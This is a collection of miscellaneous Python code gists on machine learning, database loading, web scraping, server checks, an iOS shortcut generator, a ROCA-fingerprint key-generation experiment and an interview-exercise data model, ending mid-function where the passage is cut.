y_true = np.array([[0,0,1,0],[0,0,1,0],[0,0,1.,0.]])
y_pred = np.array([[0,0,0.9,0],[0,0,0.1,0],[1,1,0.1,1.]])
r = dice_coef_loss(
K.theano.shared(y_true),
K.theano.shared(y_pred),
).eval()
print('dice_coef_loss',r)
r = keras.objectives.binary_crossentropy(
K.theano.shared(y_true),
K.theano.shared(y_pred),
).eval()
print('binary_crossentropy',r)
print('binary_crossentropy_scaled',r/r.max())
# TYPE |Almost_right |half right |all_wrong
# dice_coef_loss [ 0.00355872 0.40298507 0.76047904]
# binary_crossentropy [ 0.0263402 0.57564635 12.53243514]
```
#### File: hard-gists/77a4640bb5fcd1e7f038/snippet.py
```python
import psycopg2
from basiclogger import pyLogger
#from datetime import datetime
from pandas import DataFrame
from sqlalchemy import create_engine
FILENAME = 'dataframetopostgres.log'
class Df2Pg:
"""Puts the data in the DataFrame in a Postgres database
"""
class ReadFaker:
""" This could be extended to include the index column optionally. Right now the index
is not inserted
"""
def __init__(self, data):
self.iter = list(data.itertuples())
def readline(self, size=None):
try:
prop = self.iter.pop(0)
line = prop[1:] # element 0 is the index
row = '\t'.join(x if isinstance(x, str) else str(x) for x in line) + '\n'
# in my case all strings in line are unicode objects.
except IndexError:
return ''
else:
return row
read = readline
def __init__(self, df, user, password, host, port, databasename, table, columns=None, logname=FILENAME):
""" Gets:
df - the dataframe
table - the table name
conn_str - psycopg2 connection string
columns - list with field names
example:
Df2Pg(df, user, pass, host, port, dbname, 's_schema.t_table', ['field1','field2'])
"""
self.logger = pyLogger(logname, 'INFO')
conn_str = 'postgres://{}:{}@{}:{}/{}'.format(user, password, host, port, databasename)
self.__insert(df, table, conn_str, columns)
def __insert(self, df, table, conn_str, columns=None):
#time1 = datetime.now()
        close_con = True  # the connection is opened locally below, so close it when finished
inserted_rows = df.shape[0]
data = self.ReadFaker(df)
con = psycopg2.connect(conn_str)
try:
curs = con.cursor()
# self.logger.log.debug('inserting %s entries into %s ...' % (inserted_rows, table))
if columns is not None:
curs.copy_from(data, table, null='nan', columns=[col for col in columns])
else:
curs.copy_from(data, table, null='nan')
con.commit()
curs.close()
if close_con:
con.close()
except psycopg2.Error as e:
self.logger.log.error(e.pgerror)
self.logger.log.error(e.pgcode)
con.rollback()
if close_con:
con.close()
raise e
#time2 = datetime.now()
# self.logger.log.debug(time2 - time1)
self.logger.close()
return inserted_rows
class Pg2Df():
"""Converts a pg database query into a Pandas DataFrame"""
def __init__(self, user, password, host, port, databasename, sql, logname=FILENAME):
self.logger = pyLogger(logname, 'INFO')
self.__insert(user, password, host, port, databasename, sql)
def __insert(self, user, password, host, port, databasename, sql):
"""Creates the engine, sends the SQL retrieves the DataFrame"""
try:
connstring = 'postgres://{}:{}@{}:{}/{}'.format(user, password, host, port, databasename)
engine = create_engine(connstring, echo=False, implicit_returning=False)
rs = engine.execute(sql)
d = rs.fetchall()
h = list(rs.keys())
self.dtf = DataFrame.from_records(d, columns=h)
engine.dispose()
except Exception as e:
            self.logger.log.error('Error retrieving data from the database')
self.logger.log.error(e)
raise e
self.logger.close()
return self.dtf
```
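A minimal usage sketch for the two classes above, assuming a reachable Postgres instance; the credentials, schema, and column names below are placeholders rather than part of the original gist.

```python
import pandas as pd

# Hypothetical example: credentials, schema and columns are placeholders.
df = pd.DataFrame({'a': [1, 2, 3], 'b': ['x', 'y', 'z']})

# Bulk-insert the frame via COPY FROM; the column list must match the target table.
Df2Pg(df, 'user', 'secret', 'localhost', 5432, 'mydb',
      's_schema.t_table', columns=['a', 'b'])

# Read it back through SQLAlchemy into a fresh DataFrame.
reader = Pg2Df('user', 'secret', 'localhost', 5432, 'mydb',
               'SELECT a, b FROM s_schema.t_table')
print(reader.dtf.head())
```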
#### File: hard-gists/780379/snippet.py
```python
import urllib
import urllib2
import socket
from google.appengine.api import urlfetch
from google.appengine.api.urlfetch import DownloadError
from google.appengine.ext import db
from models import Status, Service, Event
from datetime import datetime, timedelta, date
results = {}
servers = [
{
"service": "a_server",
"url": "http://aserver.com"
},
{
"service": "another_server",
"url": "http://anotherserver.com"
}
]
def serverisup (service):
# Create a new event with the given status and given service
service = Service.get_by_slug(service)
status = Status.get_by_slug("up")
e = Event(service=service, status=status, message="The server is responding.")
e.put()
def serverisdown (service):
# Create a new event with the given status and given service
service = Service.get_by_slug(service)
status = Status.get_by_slug("down")
e = Event(service=service, status=status, message="The server could not be reached")
e.put()
def check(service,url):
print "Checking " + service + " (" + url + ")..."
try:
results[service] = urlfetch.fetch(url, headers = {'Cache-Control' : 'max-age=30'}, deadline=30 )
except urlfetch.Error:
serverisdown(service)
except DownloadError:
serverisdown(service)
else:
if results[service].status_code == 500:
serverisdown(service)
else:
serverisup(service)
for row in servers:
check(row['service'],row['url'])
```
#### File: hard-gists/7814472/snippet.py
```python
import marisa_trie
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
# hack to store vocabulary in MARISA Trie
class _MarisaVocabularyMixin(object):
def fit_transform(self, raw_documents, y=None):
super(_MarisaVocabularyMixin, self).fit_transform(raw_documents)
self._freeze_vocabulary()
return super(_MarisaVocabularyMixin, self).fit_transform(raw_documents, y)
def _freeze_vocabulary(self):
if not self.fixed_vocabulary_:
self.vocabulary_ = marisa_trie.Trie(self.vocabulary_.keys())
self.fixed_vocabulary_ = True
del self.stop_words_
class MarisaCountVectorizer(_MarisaVocabularyMixin, CountVectorizer):
pass
class MarisaTfidfVectorizer(_MarisaVocabularyMixin, TfidfVectorizer):
def fit(self, raw_documents, y=None):
super(MarisaTfidfVectorizer, self).fit(raw_documents)
self._freeze_vocabulary()
return super(MarisaTfidfVectorizer, self).fit(raw_documents, y)
```
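A short usage sketch, assuming `marisa_trie` and scikit-learn are installed; the toy corpus is invented and the memory savings depend on vocabulary size.

```python
# Hypothetical example: the MARISA-backed classes are drop-in replacements
# for CountVectorizer / TfidfVectorizer.
corpus = [
    "the quick brown fox",
    "jumped over the lazy dog",
    "the dog barked at the fox",
]

vec = MarisaCountVectorizer()
X = vec.fit_transform(corpus)          # vocabulary_ is now a marisa_trie.Trie
print(X.shape, len(vec.vocabulary_))

tfidf = MarisaTfidfVectorizer()
X_tfidf = tfidf.fit_transform(corpus)  # same API as the plain TfidfVectorizer
print(X_tfidf.shape)
```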
#### File: hard-gists/7870550/snippet.py
```python
import plistlib
import BaseHTTPServer
import webbrowser
import uuid
from io import BytesIO
import Image
import photos
import notification
import console
class ConfigProfileHandler (BaseHTTPServer.BaseHTTPRequestHandler):
config = None
def do_GET(s):
s.send_response(200)
s.send_header('Content-Type', 'application/x-apple-aspen-config')
s.end_headers()
plist_string = plistlib.writePlistToString(ConfigProfileHandler.config)
s.wfile.write(plist_string)
def log_message(self, format, *args):
pass
def run_server(config):
ConfigProfileHandler.config = config
server_address = ('', 0)
httpd = BaseHTTPServer.HTTPServer(server_address, ConfigProfileHandler)
sa = httpd.socket.getsockname()
webbrowser.open('safari-http://localhost:' + str(sa[1]))
httpd.handle_request()
notification.schedule('Tap "Install" to add the shortcut to your homescreen.', 1.0)
def main():
console.alert('Shortcut Generator', 'This script adds a "Webclip" shortcut to your homescreen. The shortcut can be used to open a web page in full-screen mode, or to launch a custom URL (e.g. a third-party app). You\'ll be asked for a title, a URL, and an icon (from your camera roll).', 'Continue')
label = console.input_alert('Shortcut Title', 'Please enter a short title for the homescreen icon.', '', 'Continue')
if not label:
return
url = console.input_alert('Shortcut URL', 'Please enter the full URL that the shortcut should launch.', '', 'Continue')
if not url:
return
icon = photos.pick_image()
if not icon:
return
console.show_activity('Preparing Configuration profile...')
data_buffer = BytesIO()
icon.save(data_buffer, 'PNG')
icon_data = data_buffer.getvalue()
unique_id = uuid.uuid4().urn[9:].upper()
config = {'PayloadContent': [{'FullScreen': True,
'Icon': plistlib.Data(icon_data), 'IsRemovable': True,
'Label': label, 'PayloadDescription': 'Configures Web Clip',
'PayloadDisplayName': label,
'PayloadIdentifier': 'com.omz-software.shortcut.' + unique_id,
'PayloadOrganization': 'omz:software',
'PayloadType': 'com.apple.webClip.managed',
'PayloadUUID': unique_id, 'PayloadVersion': 1,
'Precomposed': True, 'URL': url}],
'PayloadDescription': label,
'PayloadDisplayName': label + ' (Shortcut)',
'PayloadIdentifier': 'com.omz-software.shortcut.' + unique_id,
'PayloadOrganization': 'omz:software',
'PayloadRemovalDisallowed': False, 'PayloadType':
'Configuration', 'PayloadUUID': unique_id, 'PayloadVersion': 1}
console.hide_activity()
run_server(config)
if __name__ == '__main__':
main()
```
#### File: hard-gists/7880c101557297beeccda05978aeb278/snippet.py
```python
import af
cmd = af.Cmd()
def isSysJob(job):
return job['st'] == 0
## Jobs ##
joblist = cmd.getJobList()
job_state_counters = {}
job_count = 0
for job in joblist:
if isSysJob(job):
continue
job_count += 1
for s in job['state'].split():
job_state_counters[s] = job_state_counters.get(s, 0) + 1
print("Out of %d jobs:" % job_count)
print(" * %d are running" % job_state_counters.get('RUN', 0))
print(" * %d have error" % job_state_counters.get('ERR', 0))
print(" * %d are skipped" % job_state_counters.get('SKP', 0))
print(" * %d are off" % job_state_counters.get('OFF', 0))
print(" * %d are ready" % job_state_counters.get('RDY', 0))
print(" * %d are done" % job_state_counters.get('DON', 0))
# Note that the sum may exceed the total number of jobs because a job can have
# several states
print("")
## Renders ##
renderlist = cmd.renderGetList()
render_state_counts = {}
for render in renderlist:
for s in render['state'].split():
render_state_counts[s] = render_state_counts.get(s, 0) + 1
print("Out of %d renders:" % len(renderlist))
print(" * %d are online" % render_state_counts.get('ONL', 0))
print(" * %d are offline" % render_state_counts.get('OFF', 0))
print(" * %d are nimby" % render_state_counts.get('NBY', 0))
print(" * %d are running" % render_state_counts.get('RUN', 0))
print(" * %d are dirty" % render_state_counts.get('DRT', 0))
# Note that the sum may exceed the total number of renders because a render can
# have several states
```
#### File: hard-gists/7948151/snippet.py
```python
import numpy as np
from sklearn.decomposition import PCA
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.cluster import KMeans
from sklearn.metrics.pairwise import euclidean_distances
class KMeansCoder(BaseEstimator, TransformerMixin):
"""K-means based dictionary learning
    The fit method receives an array of signals, whitens them using
    a PCA transform and runs a KMeans algorithm to extract the patch
    cluster centers.
    The input is then correlated with each individual "patch-center"
    treated as a convolution kernel. The transformation can be done
    using various sparse coding methods, thresholding or the triangle
    k-means non-linearity.
This estimator only implements the unsupervised feature extraction
part of the referenced paper. Image classification can then be
performed by training a linear SVM model on the output of this
estimator.
Parameters
----------
n_atoms: int,
number of centers extracted by the kmeans algorithm
whiten: boolean, optional: default True
perform a whitening PCA on the data at feature extraction time
n_components: int, optional: default None
number of components to keep after whitening individual samples
max_iter: int, default 100
maximum number of iterations to run the k-means algorithm
    n_init: int, default 1
number of times to initialize the k-means algorithm in order to
avoid convergence to local optima
n_prefit: int, default 5
dimension of reduced curriculum space in which to prefit the k-means
algorithm for increased performance.
This is used only when `whiten=True`.
tol: float, default 1e-4
tolerance for numerical errors
local_contrast: boolean, optional: default True
perform local contrast normalization on the extracted patch
verbose: bool, default False
whether to display verbose output
transform_algorithm: {'lasso_lars', 'lasso_cd', 'lars', 'omp', 'threshold'}
Algorithm used to transform the data.
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection X.T * Y
transform_n_nonzero_coefs: int, 0.1 * n_features by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
transform_alpha: float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
If `algorithm='threshold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
split_sign: bool, default False
whether to split the transformed feature vectors into positive and
negative components, such that the downstream classification algorithms
can assign different weights depending on the sign
n_jobs: int,
number of parallel jobs to run
Attributes
----------
components_: array of shape n_atoms, n_features
centers extracted by k-means from the patch space
Reference
---------
An Analysis of Single-Layer Networks in Unsupervised Feature Learning
<NAME>, <NAME> and <NAME>. In NIPS*2010 Workshop on
Deep Learning and Unsupervised Feature Learning.
http://robotics.stanford.edu/~ang/papers/nipsdlufl10-AnalysisSingleLayerUnsupervisedFeatureLearning.pdf
"""
def __init__(self, n_atoms, whiten=True, n_components=None,
max_iter=100, n_init=1, n_prefit=5, tol=1e-4,
local_contrast=True, n_drop_components=0, verbose=False,
transform_algorithm='omp', transform_n_nonzero_coefs=None,
transform_alpha=None, split_sign=False, n_jobs=1):
self.n_atoms = n_atoms
self.whiten = whiten
self.max_iter = max_iter
self.n_init = n_init
self.n_components = n_components
self.local_contrast = local_contrast
self.n_prefit = n_prefit
self.verbose = verbose
self.tol = tol
self.transform_algorithm = transform_algorithm
self.transform_n_nonzero_coefs = transform_n_nonzero_coefs
self.transform_alpha = transform_alpha
self.split_sign = split_sign
self.n_jobs = n_jobs
def local_contrast_normalization(self, X):
"""Normalize the patch-wise variance of the signal
Parameters
----------
X: array-like, shape n_samples, n_features
Data to be normalized
Returns
-------
X:
Data after individual normalization of the samples
"""
# XXX: this should probably be extracted somewhere more general
# center all colour channels together
X = X.reshape((X.shape[0], -1))
X -= X.mean(axis=1)[:, None]
X_std = X.std(axis=1)
# Cap the divisor to avoid amplifying samples that are essentially
# a flat surface into full-contrast salt-and-pepper garbage.
# the actual value is a wild guess
# This trick is credited to <NAME>
min_divisor = (2 * X_std.min() + X_std.mean()) / 3
X /= np.maximum(min_divisor, X_std).reshape(
(X.shape[0], 1))
return X
def fit(self, X, y=None, **kwargs):
"""Fit the encoder on a collection of data, e.g. image patches.
Parameters
----------
X: array-like, shape: n_samples, n_features
the patch data to be fitted
Returns
-------
self: object
Returns the object itself
"""
X = np.atleast_2d(X)
n_samples, n_features = X.shape
# normalize each patch individually
if self.local_contrast:
if self.verbose:
print "Local contrast normalization of the data"
X = self.local_contrast_normalization(X)
# kmeans model to find the filters
if self.verbose:
print "About to extract atoms from %d samples" % n_samples
kmeans = KMeans(n_clusters=self.n_atoms, init='k-means++',
max_iter=self.max_iter, n_init=self.n_init,
tol=self.tol, verbose=self.verbose)
if self.whiten:
if self.verbose:
print "Whitening PCA of the samples"
self.pca = pca = PCA(whiten=True, n_components=self.n_components)
pca.fit(X)
X = pca.transform(X)
# compute the KMeans centers
if 0 < self.n_prefit < pca.n_components:
if self.verbose:
print "First KMeans in simplified curriculum space"
# starting the kmeans on a the projection to the first singular
# components: curriculum learning trick by <NAME>
kmeans.fit(X[:, :self.n_prefit])
# warm restart by padding previous centroids with zeros
# with full dimensionality this time
kmeans.init = np.zeros((self.n_atoms, pca.n_components),
dtype=kmeans.cluster_centers_.dtype)
kmeans.init[:, :self.n_prefit] = kmeans.cluster_centers_
if self.verbose:
print "Second KMeans in full whitened sample space"
kmeans.set_params(n_init=1).fit(X)
else:
if self.verbose:
print "KMeans in full original sample space"
# regular kmeans fit (without the curriculum trick)
kmeans.fit(X)
# project back the centers in original, non-whitened space (useful
# for qualitative inspection of the filters)
self.components_ = self.pca.inverse_transform(
kmeans.cluster_centers_)
else:
# find the kernel in the raw original dimensional space
# TODO: experiment with component wise scaling too
self.pca = None
kmeans.fit(X)
self.components_ = kmeans.cluster_centers_
self.kmeans = kmeans
self.inertia_ = kmeans.inertia_
return self
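    # Note: transform() below relies on BaseDictionaryLearning, which is not
    # imported in this snippet (it came from an older scikit-learn API).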
def transform(self, X, y=None):
"""Map a collection of samples into the feature space
""" + BaseDictionaryLearning.transform.__doc__
if self.local_contrast:
# TODO: make it inplace by default explictly
X = self.local_contrast_normalization(X)
return BaseDictionaryLearning.transform(self, X, y)
if __name__ == '__main__':
"""
Dictionary learning with K-Means on faces image data
====================================================
This shows 400 dictionary atoms learned from 6x6 image patches extracted from
the face recognition dataset. The dictionary atoms are learned using
(:ref:`KMeansCoder`), with and respectively without a whitening PCA transform.
The dataset used in this example is a preprocessed excerpt of the
"Labeled Faces in the Wild", aka LFW_:
http://vis-www.cs.umass.edu/lfw/lfw-funneled.tgz (233MB)
.. _LFW: http://vis-www.cs.umass.edu/lfw/
.. |kc_no_w| image:: /images/plot_kmeans_coder_1.png
:scale: 50%
.. |kc_w| image:: /images/plot_kmeans_coder_2.png
:scale: 50%
.. centered:: |kc_no_w| |kc_w|
"""
print __doc__
from time import time
import logging
import pylab as pl
import numpy as np
from sklearn.cross_validation import StratifiedKFold
from sklearn.datasets import fetch_lfw_people
from sklearn.feature_extraction.image import PatchExtractor
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
###############################################################################
# Download the data, if not already on disk and load it as numpy arrays
lfw_people = fetch_lfw_people(min_faces_per_person=70, resize=0.4)
# reshape the data using the traditional (n_samples, n_features) shape
faces = lfw_people.data
n_samples, h, w = lfw_people.images.shape
X = faces
X -= X.mean(axis=1)[:, np.newaxis]
n_features = X.shape[1]
X = X.reshape((n_samples, h, w))
# the label to predict is the id of the person
y = lfw_people.target
target_names = lfw_people.target_names
n_classes = target_names.shape[0]
print "Total dataset size:"
print "n_samples: %d" % n_samples
print "n_features: %d" % n_features
print "n_classes: %d" % n_classes
###############################################################################
# Split into a training set and a test set using a stratified k fold
train, test = iter(StratifiedKFold(y, n_folds=4)).next()
X_train, X_test = X[train], X[test]
y_train, y_test = y[train], y[test]
###############################################################################
# Compute a PCA (eigenfaces) on the face dataset (treated as unlabeled
# dataset): unsupervised feature extraction / dimensionality reduction
n_atoms = 400
print "Extracting image patches from %d faces" % len(X_train)
t0 = time()
extr = PatchExtractor(patch_size=(6, 6), max_patches=100, random_state=0)
patches = extr.transform(X_train)
print "done in %0.3fs" % (time() - t0)
print "Extracting %d atoms from %d patches" % (
n_atoms, len(patches))
t0 = time()
patches = patches.reshape((patches.shape[0], patches.shape[1] * patches.shape[2]))
kc1 = KMeansCoder(n_atoms, max_iter=5, verbose=True, whiten=False).fit(patches)
print "done in %0.3fs" % (time() - t0)
print "Extracting %d whitened atoms from %d patches" % (
n_atoms, len(patches))
t0 = time()
kc2 = KMeansCoder(n_atoms, max_iter=5, verbose=True, whiten=True).fit(patches)
print "done in %0.3fs" % (time() - t0)
###############################################################################
# Qualitative evaluation of the extracted filters
n_row = int(np.sqrt(n_atoms))
n_col = int(np.sqrt(n_atoms))
titles = ["without whitening PCA", "with whitening PCA"]
for img_index, components in enumerate((kc1.components_, kc2.components_)):
pl.figure(figsize=(5, 6))
pl.suptitle("Dictionary learned with K-Means on the \n LFW dataset " +
titles[img_index])
for i, atom in enumerate(components):
pl.subplot(n_row, n_col, i + 1)
pl.imshow(atom.reshape((6, 6)), cmap=pl.cm.gray,
interpolation="nearest")
pl.xticks(())
pl.yticks(())
pl.subplots_adjust(0.02, 0.03, 0.98, 0.90, 0.14, 0.01)
pl.show()
```
#### File: hard-gists/795180/snippet.py
```python
from scrapy.spider import BaseSpider
# Requires this patch:
# https://github.com/joehillen/scrapy/commit/6301adcfe9933b91b3918a93387e669165a215c9
from scrapy.selector import PyQuerySelector
class DmozSpiderPyQuery(BaseSpider):
name = "pyquery"
allowed_domains = ["dmoz.org"]
start_urls = [
"http://www.dmoz.org/Computers/Programming/Languages/Python/Books/",
"http://www.dmoz.org/Computers/Programming/Languages/Python/Resources/"
]
def parse(self, response):
pq = PyQuerySelector(response)
sites = pq('ul li')
for site in sites:
title = pq(site).find('a').text()
link = pq(site).find('a').attr.href
desc = pq(site).text()
print title, link, desc
```
#### File: hard-gists/7a3fc9739b7778f6673a458605e18963/snippet.py
```python
from itertools import count
from collections import defaultdict
import numpy as np
from scipy.sparse import csr
def vectorize(lil, ix=None, p=None):
"""
Creates a scipy csr matrix from a list of lists (each inner list is a set of values corresponding to a feature)
parameters:
-----------
lil -- list of lists (dimension of inner lists should be the same)
ix -- index generator (default None)
p -- dimension of featrure space (number of columns in the sparse matrix) (default None)
"""
if (ix == None):
ix = defaultdict(count(0).next)
n = len(lil[0]) # num samples
g = len(lil) # num groups
nz = n * g # number of non-zeros
col_ix = np.empty(nz, dtype=int)
for i, d in enumerate(lil):
        # append index k with __i in order to prevent mapping different columns with same id to same index
col_ix[i::g] = [ix[str(k) + '__' + str(i)] for k in d]
row_ix = np.repeat(np.arange(0, n), g)
data = np.ones(nz)
if (p == None):
p = len(ix)
    # only features that are less than p (size of feature vector) are considered
ixx = np.where(col_ix < p)
return csr.csr_matrix((data[ixx], (row_ix[ixx], col_ix[ixx])), shape=(n, p)), ix
```
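A brief example of the one-hot layout `vectorize` produces (e.g. for factorization-machine style features); the user and item ids below are made up.

```python
# Hypothetical example: two categorical groups (users, items), row-aligned.
users = ['u1', 'u2', 'u1', 'u3']
items = ['i9', 'i9', 'i7', 'i9']

X, ix = vectorize([users, items])
print(X.toarray())   # each row has exactly one 1 per group
print(dict(ix))      # e.g. {'u1__0': 0, 'i9__1': 1, ...}

# Reuse the same index and feature dimension when encoding new rows.
X_new, _ = vectorize([['u2'], ['i7']], ix=ix, p=X.shape[1])
```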
#### File: hard-gists/7a9e046470dcf05420d4cdc2b2defd79/snippet.py
```python
from amazon.api import AmazonAPI
from amazon.api import AmazonException, LookupException, AsinNotFound
class AmazonAPIWrapper(object):
"""
pip install python-amazon-simple-product-api
"""
def __init__(self, account):
self.account = account
def __enter__(self):
self.API = AmazonAPI(
self.account["ACCESS_KEY"],
self.account["SECRET_KEY"],
self.account["ASSOC_TAG"],
region = self.account["REGION"] if "REGION" in self.account else "US")
return self
def __exit__(self, exception_type, exception_value, traceback):
pass
def Lookup(self, **kwargs):
if "ItemId" not in kwargs:
raise AmazonException("Not Set ItemId")
if isinstance(kwargs["ItemId"], list):
kwargs["ItemId"] = ",".join(kwargs["ItemId"])
response = self.API.lookup(**kwargs)
if hasattr(response, "__iter__"):
for item in response:
self.item = item
yield self
else:
self.item = response
yield self
def inches2cm(self, data):
return round(float(data) / 100 * 2.54, 2)
def pounds2g(self, data):
return round(float(data) / 100 * 0.4536 * 1000, 2)
@property
def region(self):
return self.API.region
@property
def asin(self):
return self.item.asin
@property
def title(self):
return self.item.title
@property
def category(self):
if len(self.item.browse_nodes) > 0:
for i in range(len(self.item.browse_nodes)):
name = self.item.browse_nodes[i].ancestors[-1].name
if name == "jp-stores":
continue
elif name is not None:
break
if hasattr(name, "text"):
return name.text
else:
return name
else:
return None
@property
def browsenode_id(self):
if len(self.item.browse_nodes) > 0:
for i in range(len(self.item.browse_nodes)):
name = self.item.browse_nodes[i].ancestors[-1].name
if name == "jp-stores":
continue
else:
return self.item.browse_nodes[i].id
else:
return None
@property
def image_url(self):
if self.item.medium_image_url:
return str(self.item.medium_image_url)
@property
def attributes(self):
return self.item.get_attributes([
"PackageDimensions.Weight",
"PackageDimensions.Width",
"PackageDimensions.Height",
"PackageDimensions.Length"
])
@property
def weight(self):
if "PackageDimensions.Weight" in self.attributes:
return self.pounds2g(self.attributes["PackageDimensions.Weight"])
@property
def raw_weight(self):
if "PackageDimensions.Weight" in self.attributes:
return self.attributes["PackageDimensions.Weight"]
@property
def width(self):
if "PackageDimensions.Width" in self.attributes:
return self.inches2cm(self.attributes["PackageDimensions.Width"])
@property
def raw_width(self):
if "PackageDimensions.Width" in self.attributes:
return self.attributes["PackageDimensions.Width"]
@property
def height(self):
if "PackageDimensions.Height" in self.attributes:
return self.inches2cm(self.attributes["PackageDimensions.Height"])
@property
def raw_height(self):
if "PackageDimensions.Height" in self.attributes:
return self.attributes["PackageDimensions.Height"]
@property
def length(self):
if "PackageDimensions.Length" in self.attributes:
return self.inches2cm(self.attributes["PackageDimensions.Length"])
@property
def raw_length(self):
if "PackageDimensions.Length" in self.attributes:
return self.attributes["PackageDimensions.Length"]
@property
def price(self):
price, currency = self.item.price_and_currency
return price
@property
def publication_date(self):
return self.item.publication_date
@property
def release_date(self):
return self.item.release_date
@property
def sales_rank(self):
return self.item.sales_rank
@property
def total_new(self):
return self.item._safe_get_element_text('OfferSummary.TotalNew')
@property
def brand(self):
return self.item.brand
@property
def manufacturer(self):
return self.item.manufacturer
@property
def ean(self):
return self.item.ean
if __name__ == "__main__":
account = {
"ACCESS_KEY": "ACCESS_KEY",
"SECRET_KEY": "SECRET_KEY",
"ASSOC_TAG": "associate-tag"
}
with AmazonAPIWrapper(account) as API:
try:
#API.setAsinFromFile(file)
#api.Asin = ["B00F5JOIT0", "B00TS0UK0I", "B00O9GPEAC"]
            # Lookup() reads the ASIN(s) from its ItemId keyword argument
            for item in API.Lookup(ItemId="B017VFHDKQ"):
print(item.total_new)
except Exception as e:
print(e)
```
#### File: hard-gists/7aea60f80f6aa9b79cc9509b633557c9/snippet.py
```python
from random import randint, choice
from gmpy2 import is_prime # pip install gmpy2
import operator
### Code from ROCA
primes = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,
103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167]
prints = [6, 30, 126, 1026, 5658, 107286, 199410, 8388606, 536870910, 2147483646, 67109890, 2199023255550,
8796093022206, 140737488355326, 5310023542746834, 576460752303423486, 1455791217086302986,
147573952589676412926, 20052041432995567486, 6041388139249378920330, 207530445072488465666,
9671406556917033397649406,
618970019642690137449562110,
79228162521181866724264247298,
2535301200456458802993406410750,
1760368345969468176824550810518,
50079290986288516948354744811034,
473022961816146413042658758988474,
10384593717069655257060992658440190,
144390480366845522447407333004847678774,
2722258935367507707706996859454145691646,
174224571863520493293247799005065324265470,
696898287454081973172991196020261297061886,
713623846352979940529142984724747568191373310,
1800793591454480341970779146165214289059119882,
126304807362733370595828809000324029340048915994,
11692013098647223345629478661730264157247460343806,
187072209578355573530071658587684226515959365500926]
def has_fingerprint_real(modulus):
for i in range(0, len(primes)):
if (1 << (modulus % primes[i])) & prints[i] == 0:
return False
return True
## End code from ROCA
BITS = 1024
MOD = reduce(operator.mul, primes, 1)
residues_p = []
residues_q = []
for p, mask in zip(primes, prints):
res_p = randint(1, p-1)
res_q = choice([i for i, x in enumerate(bin(mask)[::-1]) if x == '1']) * pow(res_p, p - 2)
residues_p.append(res_p)
residues_q.append(res_q)
def CRT(n, a):
s = 0
for n_i, a_i in zip(n, a):
p = MOD / n_i
s += a_i * pow(p, n_i - 2) * p
return s % MOD
def get_prime(residues, bits):
b = CRT(primes, residues)
r_min = (1 << (bits - 1)) // MOD
r_max = (1 << (bits)) // MOD
while 1:
p = b + randint(r_min, r_max) * MOD
if is_prime(p):
break
return p
p = get_prime(residues_p, BITS//2)
q = get_prime(residues_q, BITS//2)
N = p * q
print "p =", p
print "q =", q
print "N =", N
print "Vulnerable according to tester:", has_fingerprint_real(N)
```
#### File: hard-gists/7ccd43b1f2f79f1bb23c70920f75cec4/snippet.py
```python
import uuid
import random
from afase.models.meta import Base
from sqlalchemy import (
Column,
Text,
Date,
ForeignKey,
String,
)
from sqlalchemy.types import (
TypeDecorator,
CHAR,
)
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import (
relationship,
validates,
)
# Trap, not really part of the code. Make them explain what it does anyhow.
class GUID(TypeDecorator):
"""Platform-independent GUID type.
Uses PostgreSQL's UUID type, otherwise uses
CHAR(32), storing as stringified hex values.
"""
impl = CHAR
# Based on how this class is used below, have them explain why the functions are named as they are.
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(UUID())
else:
return dialect.type_descriptor(CHAR(32))
def process_bind_param(self, value, dialect):
if value is None:
return value
elif dialect.name == 'postgresql':
return str(value)
else:
if not isinstance(value, uuid.UUID):
return "%.32x" % uuid.UUID(value).int
else:
# hexstring
return "%.32x" % value.int
def process_result_value(self, value, dialect):
if value is None:
return value
else:
return uuid.UUID(value)
# Trap, they'll skip this; point out that they missed something when they get to the "create" function
ALPHABET = '0123456789abcdefghjkmnpqrtvwxyz'
ALPHA_SET = set(ALPHABET)
HEXIES = set('abcdef0123456789')
# Trap, this function should not be part of the data model, it should be internal. See if they catch on it.
def gen_word(count):
    # Bug, shouldn't re-initialize the RNG every time we need it
r = random.SystemRandom()
word = ''.join(r.choice(ALPHABET) for x in range(count))
return word.capitalize()
class Token(Base):
__tablename__ = 'token'
id = Column(GUID, primary_key=True)
link = Column(Text, nullable=False)
token = Column(String(length=16), nullable=False, unique=True)
device = relationship('Device')
cabinet = relationship('Cabinet')
    # Unnecessary, see if they catch why this has an init when the other classes don't.
def __init__(self, id, token, link):
self.id = id
self.token = token
self.link = link
# Simple, let them explain this
@validates('token')
def validate_token(self, key, token):
letters = set(token)
if not ALPHA_SET.issuperset(letters):
raise ValueError("Non permitted letter in token")
return token
# Incomplete, ask them to add more validations
@validates('link')
def validate_link(self, key, link):
if not link.startswith('https://'):
raise ValueError("Non https link")
if link[-1] in ('/', '?'):
raise ValueError("Link ends in invalid char")
if link.count("/") != 3:
raise ValueError("Should have 3 and only 3 slashes in link")
return link
def __repr__(self):
return "<Token(id='{}, token='{}', link='{}')>".format(self.id, self.token, self.link)
# Make them explain why this code exists. Describe how it will be used.
# All code exists for a reason, sometimes that reason is that a programmer was drunk.
@classmethod
def normalize(cls, token):
replacements = [('o', '0'),
('l', '1'),('i','1'),
('s', '5'),
('u', 'v'),
('-',''),('_',''), (' ', '')]
word = token.lower()
for old, new in replacements:
word = word.replace(old, new)
return word
@classmethod
def create(cls):
id = uuid.uuid4()
# Below line is tricky, make them explain what it does.
